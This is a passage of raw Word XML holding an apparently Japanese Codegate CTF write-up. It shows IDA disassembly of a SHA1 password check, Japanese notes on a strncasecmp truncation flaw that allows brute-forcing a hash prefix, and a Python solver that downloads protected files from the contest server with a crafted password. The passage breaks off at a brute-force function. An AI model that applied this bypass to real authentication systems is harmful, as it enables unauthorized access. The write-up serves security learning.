mov     [esp+8], eax</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.text:08048D0A                 mov     [esp+4], edx</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.text:08048D0E                 lea     eax, [ebp+sha1_ctx]</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.text:08048D11                 mov     [esp], eax</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.text:08048D14                 call    sha1_update</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.text:08048D19                 lea     eax, [ebp+sha1_ctx]</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.text:08048D1C                 mov     [ebp+s1], eax</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.text:08048D1F                 lea     eax, [ebp+sha1_ctx]</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.text:08048D22                 mov     [esp], eax</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.text:08048D25                 call    sha1_final</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.text:08048D2A                 test    eax, eax</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.text:08048D2C                 jnz     short loc_8048D6E</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.text:08048D2E                 mov     eax, ds:stderr</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.text:08048D33                 mov     [esp+0Ch], eax  ; s</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.text:08048D37                 mov     dword ptr [esp+8], 24h ; n</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.text:08048D3F                 mov     dword ptr [esp+4], 1 ; size</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.text:08048D47                 mov     dword ptr [esp], offset aCouldNotComputeMessageDigestFor ; "could not compute message digest for"</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.text:08048D4E                 call    _fwrite</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.text:08048D53                 mov     edx, [ebp+format]</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.text:08048D56                 mov     eax, ds:stderr</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.text:08048D5B                 mov     [esp+4], edx    ; format</w:t>
      </w:r>
      <w:r w:rsidRPr="00921462">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>バグだけど関係ない</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.text:08048D5F                 mov     [esp], eax      ; stream</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.text:08048D62                 call    _fprintf</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.text:08048D67                 mov     eax, 0</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.text:08048D6C                 jmp     short loc_8048D90</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.text:08048D6E ; ---------------------------------------------------------------------------</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.text:08048D6E</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.text:08048D6E loc_8048D6E:                            ; CODE XREF: check_pw_digest+5Fj</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.text:08048D6E                 mov     eax, [ebp+s1]</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.text:08048D71                 mov     dword ptr [esp+8], 14h ; n</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.text:08048D79                 mov     edx, [ebp+_hash] ; file_table</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.text:08048D7C                 mov     [esp+4], edx    ; s2</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.text:08048D80                 mov     [esp], eax      ; s1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00921462" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00921462">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">.text:08048D83                 call    _strncasecmp    ; </w:t>
      </w:r>
      <w:r w:rsidRPr="00921462">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>バイナリのハッシュの比較が文字列である。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00921462" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00921462">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">.text:08048D83                                         ; </w:t>
      </w:r>
      <w:r w:rsidRPr="00921462">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ここがキモ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00921462" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00921462">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">.text:08048D83                                         </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00921462" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00921462">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>; .rodata:080495BD secrets_hash    db 0A3h, 6Eh, 0, 0DFh, 5, 0CBh, 0FAh, 0FFh, 3Ch, 22h, 29h, 0A1h, 89h, 7Bh, 2Bh, 8Eh, 69h, 0F9h, 0FEh, 0B3h, 0</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.text:08048D83                                         ;</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.text:08048D83                                         ; NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00921462">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>文字以降は無視されるから</w:t>
      </w:r>
      <w:r w:rsidRPr="00921462">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>"\xA3\x6E\x00"</w:t>
      </w:r>
      <w:r w:rsidRPr="00921462">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>に等しければよい</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.text:08048D83                                         ; "\xA3\x6E\x00"</w:t>
      </w:r>
      <w:r w:rsidRPr="00921462">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>に一致する</w:t>
      </w:r>
      <w:r w:rsidRPr="00921462">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>SHA1</w:t>
      </w:r>
      <w:r w:rsidRPr="00921462">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ハッシュをブルートフォースする</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.text:08048D88                 test    eax, eax</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.text:08048D8A                 setz    al</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.text:08048D8D                 movzx   eax, al</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.text:08048D90</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.text:08048D90 loc_8048D90:                            ; CODE XREF: check_pw_digest+9Fj</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.text:08048D90                 mov     edx, [ebp+var_C]</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.text:08048D93                 xor     edx, large gs:14h</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.text:08048D9A                 jz      short locret_8048DA1</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.text:08048D9C                 call    ___stack_chk_fail</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.text:08048DA1 ; ---------------------------------------------------------------------------</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.text:08048DA1</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.text:08048DA1 locret_8048DA1:                         ; CODE XREF: check_pw_digest+CDj</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.text:08048DA1                 leave</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.text:08048DA2                 retn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00921462" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00921462">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>.text:08048DA2 check_pw_digest endp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00921462" w:rsidRDefault="00921462" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00921462" w:rsidRDefault="00921462" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00C03E31" w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>--prob13.</w:t>
      </w:r>
      <w:r w:rsidR="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00C03E31" w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>from struct import *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>import hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>host = "ctf3.codegate.org";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>port = 32121;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>def dl_file(s, filename, password, output_filename):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:tab/>
        <w:t>s.send("download %s %s\n" % (filename, password));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:tab/>
        <w:t>f = open(output_filename, "wb");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:tab/>
        <w:t>try:</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t>while(1):</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r = s.recv(128)</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f.write(r);</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f.flush();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:tab/>
        <w:t>except:</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t>pass;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:tab/>
        <w:t>s.close();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>def dl_secret():</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:tab/>
        <w:t>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:tab/>
        <w:t>s.settimeout(10);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:tab/>
        <w:t>s.connect((host, port));</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p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:tab/>
        <w:t>dl_file(s, "secrets", '\M71!!', "secrets");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:tab/>
        <w:t>s.close();</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p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>def dl_sftpd():</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:tab/>
        <w:t>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:tab/>
        <w:t>s.settimeout(10);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:tab/>
        <w:t>s.connect((host, port));</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p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:tab/>
        <w:t>dl_file(s, "sftpd", '123456', "sftpd");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:tab/>
        <w:t>s.close();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>def bf():</w:t>
      </w:r>
    </w:p>
